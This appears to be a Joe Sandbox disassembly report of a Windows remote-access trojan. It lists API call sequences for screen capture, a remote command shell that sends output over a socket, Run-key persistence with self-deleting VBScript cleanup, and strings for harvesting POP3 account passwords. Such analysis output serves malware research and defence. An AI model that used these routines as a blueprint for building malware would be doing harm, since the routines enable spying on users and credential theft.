                                                                                                                                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?), ref: 00446EC3
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?), ref: 00446F37
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(004510BA,00000001), ref: 00450E29
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                              • Opcode ID: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
                                                                                                                                                                                                                              • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00444ACC: RtlEnterCriticalSection.NTDLL(?), ref: 00444ADB
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(Function_00019068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1272433827-0
                                                                                                                                                                                                                              • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                                                                                                                                              • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?), ref: 00446EC3
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?), ref: 00446F37
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00450C4E,00000001), ref: 00450D2E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                              • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                                                                                                                                              • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00005CE3,004339B1), ref: 00433CDC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                              • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                                                                                                                                              • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                                                                              • Opcode ID: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                                                                                                                                                                                              • Instruction ID: 1e6cba0042ebf2c12c09a4b69519b161692f08ba8376aa17aabccb2fe2e68a66
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81A01130A002228FE3208F308A8A30E3AACAA002C0B00803AE80CC0028EB30C0028B00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                                                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                                                                                                                                              • GetTempFileNameW.KERNEL32(?,0046B7CC,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,0046B7D8,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                                                                                                                                                • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5EB
                                                                                                                                                                                                                                • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B5FF
                                                                                                                                                                                                                                • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000), ref: 0041B60C
                                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                                                                                                                                                • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000080,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,00466330), ref: 0041B5CE
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExistsExitMutexNamePointerQuerySleepWritelstrcat
                                                                                                                                                                                                                              • String ID: 0DG$@CG$T@$WDH$exepath
                                                                                                                                                                                                                              • API String ID: 1212092484-1888628005
                                                                                                                                                                                                                              • Opcode ID: 4d0f0e3457b03c9c472909321222222eba6b5b3cbb9dfdba7dddfa544213c3c8
                                                                                                                                                                                                                              • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d0f0e3457b03c9c472909321222222eba6b5b3cbb9dfdba7dddfa544213c3c8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateDCA.GDI32(0046BAC8,00000000,00000000,00000000), ref: 00417FB9
                                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                                                                                                                                                                                                • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                                                                                                                                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                                                                                                                                                                                              • GetCursorInfo.USER32(?), ref: 004180B5
                                                                                                                                                                                                                              • GetIconInfo.USER32(?,?), ref: 004180CB
                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004180FA
                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00418107
                                                                                                                                                                                                                              • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                                                                                                                                                                                              • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00471DE4,00000000,00000000,00660046), ref: 00418144
                                                                                                                                                                                                                              • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                                                                                                                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00418285
                                                                                                                                                                                                                              • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00418344
                                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 0041834B
                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004183A1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Object$Delete$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 615876539-0
                                                                                                                                                                                                                              • Opcode ID: 732ed43ab40b0a88adf86a5b9cfa8164d1211a74050a95fd4878f259aa754b4c
                                                                                                                                                                                                                              • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 732ed43ab40b0a88adf86a5b9cfa8164d1211a74050a95fd4878f259aa754b4c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                                                                                                                                • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                                                                                                                                • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 10001855
                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 10001869
                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 1000188B
                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 100018AE
                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 100018C8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _strlen$File$CopyCreateDelete
                                                                                                                                                                                                                              • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                                                                                              • API String ID: 3296212668-3023110444
                                                                                                                                                                                                                              • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                                                              • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _strlen
                                                                                                                                                                                                                              • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                                                                                              • API String ID: 4218353326-230879103
                                                                                                                                                                                                                              • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                                                              • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3899193279-0
                                                                                                                                                                                                                              • Opcode ID: a735553c05aaed1e145321f0c93175037d6e9fee99cb60b695eaf85399c9530c
                                                                                                                                                                                                                              • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a735553c05aaed1e145321f0c93175037d6e9fee99cb60b695eaf85399c9530c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                                                                                                                                                                              • FindFirstVolumeW.KERNEL32(?,00000104), ref: 0041B242
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041B255
                                                                                                                                                                                                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                                                                                                                                                                                              • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                                                                                                                                                                              • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                                                                                                                                                                                              • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041B313
                                                                                                                                                                                                                              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                                                                                                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041B370
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuerylstrcatlstrcmplstrcpy
                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                              • API String ID: 1756451316-1684325040
                                                                                                                                                                                                                              • Opcode ID: a6103885494d84df2676d9fd4c3624434a4fe82cfecd76dcde1cff843fd7ed43
                                                                                                                                                                                                                              • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6103885494d84df2676d9fd4c3624434a4fe82cfecd76dcde1cff843fd7ed43
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                                                                                                                                                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                                                                                                                                                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000284,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileProcessSleep$CreateNamedPeekPipeReadTerminateWritesend
                                                                                                                                                                                                                              • String ID: P\G$P\G$P\G$P\G$P\G$XUF
                                                                                                                                                                                                                              • API String ID: 729113801-2988598417
                                                                                                                                                                                                                              • Opcode ID: b6cb48043a9e3661dd7d2b539814d0255ecba9ea965f8773499295e9bb7a82eb
                                                                                                                                                                                                                              • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6cb48043a9e3661dd7d2b539814d0255ecba9ea965f8773499295e9bb7a82eb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                                                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C013
                                                                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                                                                                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                                                                                                                • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                                                                                                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,00457288,00000000,?,?,?,?,00465900,0040C07B,004661E4), ref: 0041AB5F
                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,0046559C,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProcessTerminate$Thread$CurrentDeleteExecuteExitFileHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                                                                              • String ID: @CG$On Error Resume Next$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$`=G$exepath$fso.DeleteFolder "$pth_unenc$while fso.FileExists("
                                                                                                                                                                                                                              • API String ID: 97251228-1730539264
                                                                                                                                                                                                                              • Opcode ID: fc0ffd3b236c05d4f4164c9eea88da4018c2635399e637bc8c2060073dd49b9e
                                                                                                                                                                                                                              • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc0ffd3b236c05d4f4164c9eea88da4018c2635399e637bc8c2060073dd49b9e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$Info
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2509303402-0
                                                                                                                                                                                                                              • Opcode ID: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                                                                                                                              • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                                                                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
